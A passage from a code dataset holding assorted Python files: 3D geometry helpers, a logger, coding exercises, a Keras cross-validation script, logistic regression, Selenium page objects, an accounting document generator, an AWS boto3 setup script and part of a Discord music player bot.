looking at the\r\n # outside of the face).\r\n primitive = GeomTriangles(Geom.UHStatic)\r\n\r\n # Cover the rectangular faces around the edges\r\n for edge_num in rects:\r\n # cater for wrap around back to the zeroth edge number\r\n tri_ix_pairs = tri_back if edge_num == (len(self.xys) - 1) else tri_fwd\r\n for tri_ixs in tri_ix_pairs:\r\n vnums = [rects[edge_num][tri_ix] for tri_ix in tri_ixs]\r\n primitive.addVertices(*vnums)\r\n\r\n # Cover the polygonal faces on the top and bottom\r\n for poly in polys:\r\n # Use clockwise indexing on the bottom (negative normal) face and\r\n # counter clockwise on the top (positive normal) face\r\n faces = tri_bot if poly < 0 else tri_top\r\n for tri_ixs in faces:\r\n vnums = [polys[poly][tri_ix] for tri_ix in tri_ixs]\r\n primitive.addVertices(*vnums)\r\n\r\n geom = Geom(vertexData)\r\n geom.addPrimitive(primitive)\r\n\r\n self.node = GeomNode('prism gnode')\r\n self.node.addGeom(geom)\r\n\r\n\r\nclass Vector2D():\r\n \"\"\"\r\n 2D working in x-y plane with z = 0\r\n \"\"\"\r\n\r\n def __init__(self, p1, p2):\r\n self.p1 = p1\r\n self.p2 = p2\r\n self.dx = p2.x - p1.x\r\n self.dy = p2.y - p1.y\r\n self.hyp2 = self.dx * self.dx + self.dy * self.dy\r\n self.hyp = math.sqrt(self.hyp2)\r\n\r\n def norm_2D(self):\r\n return Vec3D(self.dy / self.hyp, -self.dx / self.hyp, 0)\r\n\r\n def tan_2D(self):\r\n return Vec3D(self.dx / self.hyp, self.dy / self.hyp, 0)\r\n\r\n def dist_from_2D(self, p, infinite=False):\r\n \"\"\" Distance of p0 from line segment or line through p1 and p2 \"\"\"\r\n t = ((p.x - self.p1.x) * self.dx + (p.y - self.p1.y) * self.dy) / self.hyp2\r\n if t < 0 and not infinite:\r\n # closest is p1\r\n d2x = p.x - self.p1.x\r\n d2y = p.y - self.p1.y\r\n elif t > 1 and not infinite:\r\n # closest is p2\r\n d2x = p.x - self.p2.x\r\n d2y = p.y - self.p2.y\r\n else:\r\n # closest is a projection onto the line\r\n d2x = p.x - (self.p1.x + t * self.dx)\r\n d2y = p.y - (self.p1.y + t * self.dy)\r\n return math.sqrt(d2x * d2x + d2y * d2y)\r\n\r\n\r\ndef normal_2D(p1, p2):\r\n \"\"\"\r\n 2D working in x-y plane with points represented as 2 element lists.\r\n Mapping is y2 = p2[1], x2 = p2[0], y1 = p1[1], x1 = p1[0]\r\n \"\"\"\r\n x_diff = p2[0] - p1[0]\r\n y_diff = p2[1] - p1[1]\r\n hyp = math.sqrt(x_diff * x_diff + y_diff * y_diff)\r\n # right hand normal circulating counter clockwise\r\n return [y_diff / hyp, -x_diff / hyp]\r\n\r\ndef rotate_by_1(my_list):\r\n return my_list[1:] + my_list[:1]\r\n\r\ndef calcNormals(points):\r\n return [normal_2D(p1, p2) for p1, p2 in zip(points, rotate_by_1(points))]\r\n\r\nif __name__ == '__main__':\r\n p1 = Vec3D(1, 2, 0)\r\n p2 = Vec3D(5, 7, 0)\r\n p3 = Vec3D(52, 3, 0)\r\n seg = Vector2D(p1, p2)\r\n dp3 = seg.dist_from_2D(p3)\r\n inf_dp3 = seg.dist_from_2D(p3, infinite=True)\r\n print('dp3', dp3)\r\n print('inf_dp3', inf_dp3)\r\n\r\n\r\n\r\n\r\n","repo_name":"friedgit/victorian-tiled-path","sub_path":"tile_poly.py","file_name":"tile_poly.py","file_ext":"py","file_size_in_byte":9210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33355616491","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport logging\n\n\ndef get_logger(name=__name__, stream=False):\n formatter = logging.Formatter('[%(levelname)s] %(asctime)s %(filename)s:\\n %(message)s\\n')\n logger = logging.getLogger(name)\n\n file_handler = logging.FileHandler(name + '.log') # Instantiate the file handler\n file_handler.setFormatter(formatter)\n file_handler.setLevel(logging.WARNING) 
# only logs warnings level or higher\n    logger.addHandler(file_handler)\n\n    if stream:\n        stream_handler = logging.StreamHandler() # Instantiate the stream handler AKA the console\n        stream_handler.setFormatter(formatter)\n        stream_handler.setLevel(logging.DEBUG) # shows everything on console\n        logger.addHandler(stream_handler)\n\n    # We add both handlers to the logger\n\n    logger.setLevel(logging.DEBUG) # Logger registers all logs\n\n    return logger\n","repo_name":"CoreDumped-ETSISI/core-dumped-telegram-bot","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}{"seq_id":"74832647506","text":"n,m = map(int,input().split())\nstrings = []\nchecks = []\nfor i in range(n):\n    strings.append(input())\nfor i in range(m):\n    checks.append(input())\ncount = 0\nfor check in checks:\n    if check in strings:\n        count +=1\nprint(count) \n","repo_name":"Jarry-Ha/TIL_github","sub_path":"1_python/1.study/2.baekjoon/14425.py","file_name":"14425.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}{"seq_id":"5732878137","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\nimport os\r\nos.environ["CUDA_VISIBLE_DEVICES"] = "0"\r\n\r\nimport tensorflow as tf\r\ntfconfig = tf.ConfigProto()\r\ntfconfig.gpu_options.allow_growth = True\r\nsession = tf.Session(config=tfconfig)\r\nimport sys\r\nimport numpy as np\r\nimport pandas as pd\r\nimport pickle\r\nimport keras\r\nfrom keras.models import *\r\nfrom keras.layers import *\r\nfrom keras.optimizers import *\r\nfrom keras.preprocessing import sequence\r\nfrom keras.regularizers import l2\r\nfrom keras import backend as K\r\nfrom keras.engine.topology import Layer\r\nfrom keras.backend.tensorflow_backend import set_session\r\nimport time\r\nfrom tensorflow.contrib import learn\r\nfrom sklearn.model_selection import train_test_split\r\nimport keras.backend as K\r\nfrom keras.callbacks import TensorBoard\r\nfrom keras.callbacks import Callback\r\nfrom sklearn.metrics import log_loss\r\nfrom keras.activations import softmax\r\nsys.path.append('models')\r\nfrom CNN import cnn_v1, cnn_v2, model_conv1D_, Siamese_LSTM, drmm_tks\r\nfrom ESIM import esim, decomposable_attention\r\nfrom ABCNN import ABCNN\r\nfrom bimpm import bimpm\r\nsys.path.append('utils/')\r\nsys.path.append('feature/')\r\nimport config\r\nfrom Feats import data_2id, add_hum_feats\r\nfrom help import score, train_batch_generator, train_batch_generator3, train_test, get_X_Y_from_df\r\nfrom CutWord import read_cut,read_cut_es\r\n\r\ndef load_data():\r\n    print('load data')\r\n    data = read_cut_es() #cut word\r\n    print(data)\r\n    data = data_2id(data,['q1_es_cut','q2_es_cut']) # 2id\r\n    print(data)\r\n    data = add_hum_feats(data, config.train_feats) # generate features and add them\r\n\r\n    x_train, y_train = get_X_Y_from_df(data, config.data_augment)\r\n    print(len(x_train[2]))\r\n    \r\n    return x_train, y_train\r\n\r\n\r\ndef make_train_cv_data(X_train, Y_train, Model, model_name, epoch_nums, kfolds):\r\n\r\n    from keras.models import model_from_json\r\n\r\n    json_string = Model.to_json()\r\n\r\n    S_train = np.zeros((Y_train.shape[0], epoch_nums))\r\n    S_Y = np.zeros((Y_train.shape[0], 1))\r\n\r\n    train_df = pd.DataFrame()\r\n    X, Y = X_train, Y_train\r\n    from sklearn.model_selection import KFold\r\n    kf = KFold(n_splits=kfolds, shuffle=True)\r\n    k = 0\r\n    \r\n    
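# epoch_nums is overridden to 1 here, shadowing the value passed in by the caller\r\n    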
epoch_nums =1 \r\n p, r, f ,l= [], [], [] ,[] \r\n for train_index, test_index in kf.split(Y):\r\n k += 1\r\n model = model_from_json(json_string)\r\n model.compile(loss='binary_crossentropy',\r\n optimizer='adam', metrics=['acc'])\r\n K.set_value(model.optimizer.lr, 0.005)\r\n for epoch_num in range(epoch_nums):\r\n \r\n if config.feats == []:\r\n x_train = [X[0][train_index, :], X[1][train_index, :], X[2][train_index]]\r\n x_dev = [X[0][test_index, :], X[1][test_index, :],X[2][test_index]] \r\n else:\r\n \r\n x_train = [X[0][train_index, :], X[1][train_index, :], X[2][train_index, :]]\r\n x_dev = [X[0][test_index, :], X[1][test_index, :],X[2][test_index, :]] \r\n y_train=Y[train_index,:]\r\n y_dev = Y[test_index, :]\r\n print('kf: ', k)\r\n print('epoch_num: ', epoch_num + 1)\r\n # print(x_train[0].shape, x_train[1].shape,\r\n # x_train[2].shape, y_train.shape)\r\n # print(x_dev[0].shape, x_dev[1].shape, x_dev[2].shape, y_dev.shape)\r\n\r\n model.fit_generator(\r\n train_batch_generator3(x_train, y_train, config.batch_size),\r\n epochs=5,\r\n steps_per_epoch=int(y_train.shape[0] / config.batch_size),\r\n validation_data=(x_dev, y_dev),\r\n class_weight={0: 1, 1: 4},\r\n\r\n )\r\n pred = model.predict(x_dev, batch_size=config.batch_size)\r\n pre, rec, f1 = score(y_dev, pred)\r\n \r\n loss = log_loss(y_dev, pred)\r\n \r\n S_train[test_index, epoch_num] = pred[:, 1]\r\n print('p r f1 ', pre, rec, f1)\r\n print('logloss:',loss)\r\n train_df['epoch_{0}'.format(epoch_num)] = S_train[:, epoch_num]\r\n train_df['label'] = Y_train[:, 1]\r\n p.append(pre)\r\n r.append(rec)\r\n f.append(f1)\r\n l.append(loss)\r\n \r\n model.save(config.stack_path+\"_%s_%s.h5\" %\r\n (model_name, k))\r\n print('p r f1 logloss')\r\n print(np.array([p, r, f, l]))\r\n print('mean :', np.mean(np.array([p, r, f, l]),axis=1))\r\n train_df.to_csv(config.stack_path+'train_%s.csv' % (k),\r\n index=False, )\r\n\r\n\r\ndef do_train_cv(model_name, model, epoch_nums, kfolds):\r\n X_train, Y_train = load_data()\r\n make_train_cv_data(X_train, Y_train, model, model_name, epoch_nums, kfolds)\r\n\r\n\r\ndef main(model_name):\r\n print('model name', model_name)\r\n if model_name == 'bimpm':\r\n model = bimpm()\r\n if model_name == 'drmmt':\r\n model = drmm_tks()\r\n\r\n if model_name == 'cnn':\r\n\r\n model = model_conv1D_()\r\n if model_name == 'slstm':\r\n\r\n model = Siamese_LSTM()\r\n\r\n if model_name == 'esim':\r\n model = esim()\r\n\r\n if model_name == 'dam':\r\n model = decomposable_attention()\r\n if model_name == 'abcnn':\r\n\r\n model = ABCNN(\r\n left_seq_len=config.word_maxlen, right_seq_len=config.word_maxlen, depth=3,\r\n nb_filter=100, filter_widths=[5, 4, 3],\r\n collect_sentence_representations=True, abcnn_1=True, abcnn_2=True,\r\n # mode=\"euclidean\",\r\n mode=\"cos\",\r\n # mode='dot'\r\n )\r\n do_train_cv(model_name, model, epoch_nums=1, kfolds=5)\r\n #train(x_train, y_train, x_dev, y_dev, model_name, model)\r\n\r\nif __name__ == '__main__':\r\n\r\n main(sys.argv[1])\r\n # do_cv()\r\n","repo_name":"zle1992/CIKM","sub_path":"cv.py","file_name":"cv.py","file_ext":"py","file_size_in_byte":5806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19022866175","text":"#Given an array, rotate the array to the right by k steps, where k is non-negative.\nnums=[-1,-100,3,99]\nk = 2\n\nwhile k>0:\n\tnums.insert(0,nums.pop(-1))\n\tk=k-1\n\nprint(nums)\nprint(\"\\r\")\n\n\n#Given an array of integers and an integer k, find out whether there are two distinct indices 
i and j in \n#the array such that nums[i] = nums[j] and the absolute difference between i and j is at most k.\nnums = [1,0,1,1]\nk = 1\nflag=0\n\nd={}\n\nfor i,n in enumerate(nums):\n\tif n not in d:\n\t\td[n]=i\n\telse:\n\t\tif i-d[n]<=k:\n\t\t\tflag=1\n\t\telse:\n\t\t\td[n]=i\n\n\nif flag==0:\n\tprint(\"false\")\nelse:\n\tprint(\"true\")\nprint(\"\\r\")\n\n\n#Given an array containing n distinct numbers taken from 0, 1, 2, ..., n, find the one that is missing from the array.\nnums=[1]\n\nn=len(nums)\n\nsumm=(n*(n+1))//2\nif summ!=sum(nums):\n\tif summ>sum(nums):\n\t\tprint(summ-sum(nums))\n\telse:\n\t\tprint(sum(nums)-summ)\n\nif (summ==1 and n==1) or (summ==sum(nums) and 0 not in nums):\n\tprint(\"0\")\nprint(\"\\r\")\n\n\n\n#Given an array nums, write a function to move all 0's to the end of it while maintaining the relative order of the non-zero elements.\n#method 1 \nnums=[0,1,0,3,12]\ni=0\nwhile sum(nums[i:])!=0:\n\tif nums[i]==0:\n\t\tnums.append(0)\n\t\tnums.pop(i)\n\telse:\n\t\ti=i+1\n\nprint(nums)\n\n#method 2 \nnums=[0,1,0,3,12]\nc = 0\ni=0\nwhile c 1:\n\t\tnums.insert(v+1,nums[v]+1)\n\tv=v+1\n\tk=k+1\n\nprint(nums)\n\n\n\n\n","repo_name":"Pm1995/Leetcode-","sub_path":"Leetcode(ARRAYS_2).py","file_name":"Leetcode(ARRAYS_2).py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"38345380960","text":"import numpy as np\nimport pandas as pd\n\n# IMPORTANT: DO NOT USE ANY OTHER 3RD PARTY PACKAGES\n# (math, random, collections, functools, etc. are perfectly fine)\n\n\nclass LogisticRegression:\n\n    def __init__(self):\n        self.weights = []\n\n    def fit(self, xe, ye, learning_rate, num_iters):\n\n        y = np.array(ye)[:, np.newaxis]\n        x = np.array(xe)\n        X = self.feature_engineering(x[:, 0], x[:, 1])\n\n        weights = np.array(X).shape[1]\n        weights = np.full((weights, 1), 0, dtype=np.float64)\n\n        weights = self.adjust_parameters(\n            X, y, weights, learning_rate, num_iters)\n        self.weights = weights\n\n    def feature_engineering(self, column_1, column_2):\n        num_samples = len(column_1)\n        # Initialize the feature matrix with a column of ones for the bias term.\n        features = np.ones((num_samples, 1))\n\n        # Add features that by trial and error seem to fit the datasets quite well. 
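(the quadratic term added below carves out an elliptical decision boundary). 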
As well as the original features.\n new_feature = (column_2)\n new_feature = new_feature[:, np.newaxis]\n features = np.append(features, new_feature, axis=1)\n\n new_feature = column_1\n new_feature = new_feature[:, np.newaxis]\n features = np.append(features, new_feature, axis=1)\n\n new_feature = column_1**2/2**2 + column_2**2\n new_feature = new_feature[:, np.newaxis]\n features = np.append(features, new_feature, axis=1)\n\n return features\n\n def predict(self, xe):\n\n x = np.array(xe)\n X = self.feature_engineering(x[:, 0], x[:, 1])\n\n return (sigmoid(np.dot(X, self.weights)) > 0.5).ravel()\n\n def adjust_parameters(self, x, y, weights, learning_rate, num_iters):\n\n for i in range(num_iters):\n # Calculate predictions\n predictions = sigmoid(np.dot(x, weights))\n\n # Calculate the error (how wrong the predictions are)\n error = predictions - y\n\n # Calculate how much we need to adjust the parameters (weights)\n gradient = np.dot(x.T, error) / len(y)\n weights -= learning_rate * gradient\n\n return weights\n\n# --- Some utility functions\n\n\ndef binary_accuracy(y_true, y_pred, threshold=0.5):\n\n assert np.array(y_true).shape == np.array(y_pred).shape\n y_pred_thresholded = (np.array(y_pred) >= threshold).astype(float)\n correct_predictions = y_pred_thresholded == y_true\n return correct_predictions.mean()\n\n\ndef binary_cross_entropy(y_true, y_pred, eps=1e-15):\n\n assert np.array(y_true).shape == np.array(y_pred).shape\n y_pred = np.clip(np.array(y_pred), eps, 1 - eps) # Avoid log(0)\n return - np.mean(\n np.array(y_true) * np.log(np.array(y_pred)) +\n (1 - np.array(y_true)) * (np.log(1 - np.array(y_pred)))\n )\n\n\ndef sigmoid(x):\n\n return 1. / (1. + np.exp(-x))\n","repo_name":"petersagdahl/ml_individual","sub_path":"logistic_regression/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":2821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11737132983","text":"from selenium.webdriver.common.by import By\nfrom pages.base_page import Page\n\nclass ProductPage(Page):\n\n ALL_COLOR_OPTIONS = (By.CSS_SELECTOR, '#variation_color_name li')\n COLORS = (By.CSS_SELECTOR, 'span.selection')\n All_PRODUCTS = (By.CSS_SELECTOR, \"[data-component-type='s-search-result']\")\n PRODUCT_IMG = (By.CSS_SELECTOR, \".s-image[data-image-latency='s-product-image']\")\n PRODUCT_TITLE = (By.CSS_SELECTOR, 'h2 span.a-text-normal')\n PRODUCT_TEXT = (By.CSS_SELECTOR, '.a-color-state.a-text-bold')\n PRODUCT_PRICE = (By.CSS_SELECTOR, 'span.a-price-whole')\n ADD_TO_CART = (By.ID, 'add-to-cart-button')\n GO_TO_CART = (By.CSS_SELECTOR, \"a[href='/cart?ref_=sw_gtc']\")\n def open_product_b0bbjrr25(self):\n self.open_url('https://www.amazon.com/gp/product/B07BJKRR25/')\n\n def click_first_product(self):\n self.click(*self.PRODUCT_PRICE)\n\n\n def add_to_cart(self):\n self.click(*self.ADD_TO_CART)\n\n def click_cart(self):\n self.click(*self.GO_TO_CART)\n\n\n def verify_user_can_click_thru_colors(self):\n self.find_elements(*self.ALL_COLOR_OPTIONS)\n expected_colors = ['Black', 'Blue, Over Dye', 'Bright White', 'Dark Blue Vintage']\n all_color_options = self.find_elements(*self.ALL_COLOR_OPTIONS)\n\n actual_colors = []\n for color in all_color_options[:4]:\n color.click()\n current_color = self.find_element(*self.COLORS).text\n actual_colors += [current_color]\n assert expected_colors == actual_colors, f'Expected {expected_colors} but got {actual_colors}'\n\n\n def verify_product_name_image(self):\n 
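\"\"\"Check that every search result card displays an image and a non-empty title.\"\"\"\n        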
self.find_elements(*self.All_PRODUCTS)\n all_products = self.find_elements(*self.All_PRODUCTS)\n\n for product in all_products:\n assert product.find_element(*self.PRODUCT_IMG).is_displayed(), 'Product image is missing'\n\n assert product.find_element(*self.PRODUCT_TITLE).text, 'Product title is missing'\n\n\n def verify_product_displayed(self, expected_results):\n actual_results = self.find_element(*self.PRODUCT_TEXT).text\n assert expected_results == actual_results, f'Expected {expected_results} and got {actual_results}'\n\n\n\n\n\n\n\n\n\n","repo_name":"pjumper/python-selenium-amazon","sub_path":"pages/product_page.py","file_name":"product_page.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26168845796","text":"#TODO\n# - approx. 3s per pdf, that's an hour for 1000 students\n# - currently only casting to int, need floating point?\n# - replace eval with own string parsing\n# - SUM, Random, basic maths\n# - accounts aren't currently storing their account type\n# this may affect how debiting and crediting work\n# - csv reader uses utf-8 encoding: characters like \"é\" raise UnicodeDecodeError\n# - need more error/exception testing\n# - error catching:\n# - key not in dict\n# - precision of output\n# - round/floor?\n# - Categories not currently in use:\n# - Date, inputDate, type, subaccount, acctPeriod, UsedInDocuments\n# - confirm that empty lines (with no variable can be skipped)\n\n\nimport read_in\nimport write_content\n\nimport sys\nimport re\n\nfrom collections import OrderedDict\nfrom random import randrange, seed\n\n# takes in a string describing the value of a variable\n# handles constants (cast to int), references (lookup vars in dict),\n# random (rand), and mathematical expressions\ndef parseVal(val, vars_dict):\n\n # regex to recognise a variable, defined as an alphanumeric string\n # preceded by a '$'\n aVar = re.compile(\"\\$([A-Za-z0-9]+)\")\n\n # replace $ with calls to vars_dict\n if '$' in val:\n # r'\\$(\\w+)' <-- old pattern match\n val = re.sub(aVar, r'vars_dict[\"\\1\"]', val)\n\n if \"SUM\" in val:\n print(\"Warning: SUM not yet implemented, returning 1\")\n return 1\n\n val = val.replace(\"Random\", \"randrange\")\n\n # TODO remove usage of eval\n try:\n val = eval(val)\n except (KeyError) as e:\n print(\"\\tERROR: No such key: \", end=\"\")\n print(e, end=\", evaluating term to one\\n\")\n print(\"\\tCheck that you have spelled the term correctly\")\n val = 1\n except (ZeroDivisionError):\n print(\"Trying to Divide by Zero in term {}, returning 1\".format(val))\n val = 1\n\n return val\n\ndef calculate_assignment(vars_dict, accounts_dict):\n unique_vars_dict = OrderedDict()\n unique_accounts_dict = OrderedDict()\n\n for account in accounts_dict:\n (accountType, openingBalance) = accounts_dict[account]\n unique_accounts_dict[account] = int(openingBalance)\n\n for var in vars_dict:\n (val, transType, account) = vars_dict[var]\n\n val = parseVal(val, unique_vars_dict)\n\n if var not in unique_vars_dict:\n unique_vars_dict[var] = val\n\n if account:\n if account not in accounts_dict:\n print(\"ERRORRRRRR\")\n\n if transType == \"CR\":\n # print(\"{} credited {}\".format(account, val))\n unique_accounts_dict[account] += val\n if transType == \"DR\":\n # print(\"{} debited {}\".format(account, val))\n unique_accounts_dict[account] -= val\n\n return (unique_vars_dict, unique_accounts_dict)\n\n# read in an accounts list and a var list for a single student, then print 
values\n# out to said student's folder. Random values in the lists are seeded by the\n# student's number and a version number for regeneration\n# TODO this reads in the same vars_list and accounts_list once per student.\n#      With a fair bit of refactoring we could potentially mitigate this.\n#      However, I can see interdependence of rng state across students causing\n#      issues\ndef read_csv(student_path, accounts_path, vars_path):\n\n    # read in vars_dict, don't evaluate values\n    vars_dict = read_in.readInVars(vars_path)\n\n    # read in accounts_dict, initial states\n    accounts_dict = read_in.readInAccounts(accounts_path)\n\n    students = read_in.readInStudents(student_path)\n\n    # use vars_dict and accounts_dict to generate unique per student versions\n\n    for student in students:\n        (SID, version) = student\n        try:\n            seed(SID + version)\n            (unique_vars_dict, unique_accounts_dict) = calculate_assignment(vars_dict, accounts_dict)\n            write_content.printDicts(SID, unique_accounts_dict, unique_vars_dict)\n        except UnicodeDecodeError as e:\n            print(\"Unicode decoding error:\\n\\tplease check input for non utf8\"\n                  \" characters (é, ü, â)\")\n\n\nif __name__ == \"__main__\":\n    if len(sys.argv) != 4:\n        print(\"Invalid number of args: input should be\\n\\t\"\n              \"student_list, accounts_path, vars_path\")\n    else:\n        [student_list, accounts_path, vars_path] = sys.argv[1:]\n        read_csv(student_list, accounts_path, vars_path)\n","repo_name":"ajmorton/doc_gen","sub_path":"gen_docs.py","file_name":"gen_docs.py","file_ext":"py","file_size_in_byte":4455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"71303002066","text":"import boto3 # pip install boto3\nfrom dotenv import load_dotenv\nimport dynamo_s3\nimport ia\nimport os\nimport base64\n\nload_dotenv()\n\nACCESS_KEY_ID = os.getenv('ACCESS_KEY_ID')\nSECRET_ACCESS_KEY = os.getenv('SECRET_ACCESS_KEY')\nREGION_NAME = os.getenv('REGION_NAME')\n\n\ndef connect_AWS_Services() -> bool:\n    try:\n        # CONNECT TO THE DATABASE\n        dynamo_s3.client_dynamodb = boto3.client('dynamodb',\n                                                 aws_access_key_id=ACCESS_KEY_ID,\n                                                 aws_secret_access_key=SECRET_ACCESS_KEY,\n                                                 region_name=REGION_NAME)\n        # CONNECT TO THE S3 IMAGE BUCKET\n        dynamo_s3.client_s3 = boto3.client('s3',\n                                           aws_access_key_id=ACCESS_KEY_ID,\n                                           aws_secret_access_key=SECRET_ACCESS_KEY,\n                                           region_name=REGION_NAME)\n        # CONNECT TO REKOGNITION\n        ia.client_rekognition = boto3.client('rekognition',\n                                             aws_access_key_id=ACCESS_KEY_ID,\n                                             aws_secret_access_key=SECRET_ACCESS_KEY,\n                                             region_name=REGION_NAME)\n\n        # CONNECT TO TRANSLATE\n        ia.client_translate = boto3.client('translate',\n                                           aws_access_key_id=ACCESS_KEY_ID,\n                                           aws_secret_access_key=SECRET_ACCESS_KEY,\n                                           region_name=REGION_NAME)\n    except:\n        print(\"Something went wrong connecting with AWS Services\")\n        return False\n    else:\n        print(\"AWS Services running!\")\n        return True\n\n\ndef getBase64(path: str) -> str:\n    text_file = open(path, \"r\")\n    data = text_file.read()\n    text_file.close()\n    return data\n\n\nif __name__ == '__main__':\n    if connect_AWS_Services():\n        # dynamo_s3.add_user(\"luisd\", \"0000\", \"Luis Danniel Castellanos\",\n        #                   getBase64('../testing/perfil1.txt'), \"img1.jpg\")\n        # dynamo_s3.updateUser(\"luisd\", \"0000\", \"ldecast\", \"Luis Danniel Ernesto Castellanos Galindo\")\n        # dynamo_s3.uploadPhoto('luisd', getBase64(\n        #     '../testing/sistemas.txt'), 'Sistemas.jpg', 'Pensum de sistemas')\n        # dynamo_s3.updateProfilePhoto(\"luisd\", getBase64('../testing/perfil2.txt'), 'img2.jpg')\n        # dynamo_s3.add_user(\"luisd\", 
\"1234\", \"LuisDa\", getBase64('../testing/perfil1.txt'), \"hola.jpg\")\n dynamo_s3.deletePhoto('ldecast','Fotos_Perfil/ldecast/img1.jpg')\n # dynamo_s3.get_user('ldecast')\n\n # b64_decode = base64.b64decode(getBase64('../testing/texto3.txt'))\n # ia.getPhotoLabels(b64_decode)\n # ia.extractText(b64_decode)\n # ia.translateText('Hola mundo', 'fr')\n pass\n","repo_name":"ldecast/PORTAL-DE-FOTOS","sub_path":"storage-IA/python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39076867206","text":"from typing import Union\nfrom datetime import timedelta\nfrom discord.ext import tasks\nfrom marcel.util import embed_message\nimport asyncio\nimport discord\nimport time\nimport youtube_dl\nimport logging\nimport random\n\n\"\"\"\n Marcel the Discord Bot\n Copyright (C) 2019-2020 akrocynova\n\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program. If not, see .\n\"\"\"\n\nclass PlayerInfo:\n def __init__(\n self,\n title: str = None,\n author: str = None,\n thumbnail: str = None,\n duration: int = 0,\n url: str = None,\n playback_url: str = None,\n found: bool = False,\n from_ytdl: bool = False,\n error: str = None) -> None:\n \"\"\"Media player information\"\"\"\n self.title = title\n self.author = author\n self.thumbnail = thumbnail\n\n if isinstance(duration, int):\n self.duration = duration\n else:\n try:\n self.duration = int(duration)\n\n except:\n self.duration = 0\n\n self.url = url\n self.playback_url = playback_url\n self.found = found\n self.error = error\n if self.error is None:\n self.short_error = None\n elif len(self.error) >= 256:\n self.short_error = \"{}...\".format(self.error[:253])\n else:\n self.short_error = error\n\n # This indicates the Media Player that the PlayerInfo was extracted from youtube-dl\n # The Media Player will fetch the regular URL using youtube-dl right before playing it\n # to fix an issue where the extracted playback URLs expire after some time\n self.from_ytdl = from_ytdl\n\n def clear(self) -> None:\n self.title = None\n self.author = None\n self.thumbnail = None\n self.duration = 0\n self.url = None\n self.playback_url = None\n self.found = False\n\n def is_http(self) -> bool:\n if self.playback_url:\n if self.playback_url.startswith(\"http://\") or self.playback_url.startswith(\"https://\"):\n return True\n\n return False\n\n def copy(self):\n return PlayerInfo(\n title=self.title,\n author=self.author,\n thumbnail=self.thumbnail,\n duration=self.duration,\n url=self.url,\n playback_url=self.playback_url,\n found=self.found,\n from_ytdl=self.from_ytdl\n )\n\n def get_embed(self, title: str, color: discord.Color, show_duration: bool = True) -> discord.Embed:\n \"\"\"Create a discord.Embed to display PlayerInfo information\"\"\"\n\n embed = discord.Embed(\n title=self.title if self.title else \"[untitled]\",\n description=\"by {}\".format(self.author if self.author else \"[unknown]\"),\n url=self.url 
if self.url else \"\",\n color=color\n )\n\n embed.set_author(name=title)\n if self.thumbnail:\n embed.set_thumbnail(url=self.thumbnail)\n\n if show_duration and self.duration > 0:\n embed.set_footer(text=str(timedelta(seconds=self.duration)).split(\".\")[0].strip())\n\n return embed\n\nclass MarcelMediaPlayer:\n def __init__(\n self,\n guild: discord.Guild,\n volume: float = 1.0,\n volume_limit: float = 1.25,\n player_queue_limit: int = 20,\n duration_limit: int = 1800,\n idle_limit: int = 0) -> None:\n \"\"\"Marcel media player\n guild: discord.Guild() to which the media player belongs to\n volume: volume value (1.0 represents 100%)\n volume_limit: maximum volume value (1.0 represents 125%)\n player_queue_limit: maximum size of the player queue\n duration_limit: maximum requested media duration (in seconds)\n idle_limit: time (in seconds) of inactivity after which the bot will\n automatically disconnect from the voice channel\n (0 to disable)\n \"\"\"\n self.guild = guild\n self.player_volume = volume\n self.player_volume_limit = volume_limit\n self.player_queue_limit = player_queue_limit\n self.duration_limit = duration_limit\n self.idle_limit = idle_limit\n\n self.voice_client = None\n self.autoplay = False\n self.previous_channel = None\n self.player_busy = False\n self.player_info = PlayerInfo()\n self.last_played = None\n self.player_queue = list()\n\n self.loop = asyncio.get_event_loop()\n self.connect_timeout = 10.0\n self.last_active = time.time()\n self.last_not_alone = time.time()\n\n self.on_voice_join = None\n self.on_voice_leave = None\n self.on_media_play = None\n\n @tasks.loop(seconds=30)\n async def inactivity_loop(self) -> None:\n if self.is_in_voice_channel():\n if self.is_media_playing():\n self.last_active = time.time()\n\n elif self.idle_limit > 0 and time.time() - self.last_active >= self.idle_limit:\n await self.leave_voice_channel(reason=\"inactive for a while\")\n return\n\n for member in self.voice_client.channel.members:\n if member == self.guild.me:\n continue\n if not member.voice.afk:\n self.last_not_alone = time.time()\n return\n\n if time.time() - self.last_not_alone >= 60:\n await self.leave_voice_channel(reason=\"bot is alone\")\n\n else:\n self.inactivity_loop.stop()\n\n @inactivity_loop.after_loop\n async def inactivity_loop_after(self) -> None:\n if self.is_in_voice_channel():\n logging.critical(\"Inactivity loop stopped but voice is still connected (guild: {})\".format(self.guild.id))\n await self.leave_voice_channel(reason=\"unexpected error\")\n\n def after_callback(self, error: Exception = None) -> None:\n \"\"\"Callback after a media has finished playing\"\"\"\n\n logging.info(\"after_callback for guild: {}\".format(self.guild.id))\n if error:\n logging.error(\"after_callback error for guild: {}: {}\".format(self.guild.id, error))\n\n if self.autoplay:\n if self.player_busy:\n 